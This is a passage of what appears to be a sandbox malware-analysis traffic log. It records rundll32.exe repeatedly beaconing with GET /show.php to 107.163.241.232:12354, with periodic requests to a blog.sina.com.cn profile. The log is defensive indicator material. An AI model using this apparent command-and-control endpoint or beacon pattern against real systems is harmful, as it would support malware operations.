                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.4 | 49883 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:49.443798065 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:51.010355949 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.4 | 49895 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:50.870852947 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.4 | 49896 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:51.397738934 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.4 | 49910 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:52.603718042 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.4 | 49912 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:52.711555958 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:54.279504061 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.2.4 | 49913 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:52.711688042 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.2.4 | 49930 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:54.843027115 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.2.4 | 49932 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:54.955281973 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.2.4 | 49947 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:56.846805096 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              28 | 192.168.2.4 | 49949 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:56.850697041 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.2.4 | 49950 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:56.850830078 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:58.345418930 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.2.4 | 49969 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:59.011954069 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.2.4 | 49971 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:24:59.116897106 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32 | 192.168.2.4 | 49985 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:00.617780924 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33 | 192.168.2.4 | 49987 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:00.726824045 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              34 | 192.168.2.4 | 49988 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:00.727241039 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:02.299369097 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              35 | 192.168.2.4 | 50005 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:02.856947899 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              36 | 192.168.2.4 | 50008 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:02.980178118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              37 | 192.168.2.4 | 50024 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:04.621783972 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              38 | 192.168.2.4 | 50026 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:04.734020948 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:06.308722973 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              39 | 192.168.2.4 | 50027 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:04.734268904 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              40 | 192.168.2.4 | 50046 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:06.862236977 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              41 | 192.168.2.4 | 50048 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:06.995634079 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              42 | 192.168.2.4 | 50064 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:08.616647959 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              43 | 192.168.2.4 | 50066 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:08.731767893 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              44 | 192.168.2.4 | 50067 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:08.732338905 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:10.304788113 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              45 | 192.168.2.4 | 50086 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:10.876811981 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              46 | 192.168.2.4 | 50088 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:10.992366076 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              47 | 192.168.2.4 | 50104 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:12.633485079 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              48 | 192.168.2.4 | 50106 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:12.742552996 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              49 | 192.168.2.4 | 50107 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:12.744430065 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:14.316438913 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              50 | 192.168.2.4 | 50129 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:14.871700048 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              51 | 192.168.2.4 | 50131 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:14.991518974 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              52 | 192.168.2.4 | 50147 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:16.647640944 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              53 | 192.168.2.4 | 50150 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:16.767366886 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              54 | 192.168.2.4 | 50151 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:16.767755032 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:18.348057032 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              55 | 192.168.2.4 | 50173 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:18.890381098 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              56 | 192.168.2.4 | 50175 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:19.007800102 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              57 | 192.168.2.4 | 50192 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:20.652548075 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              58 | 192.168.2.4 | 50195 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:20.769032001 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              59 | 192.168.2.4 | 50196 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:20.770831108 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:22.352791071 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              60 | 192.168.2.4 | 50223 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:22.933326960 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              61 | 192.168.2.4 | 50226 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:23.269782066 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              62 | 192.168.2.4 | 50240 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:24.666181087 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              63 | 192.168.2.4 | 50243 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:24.777081013 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
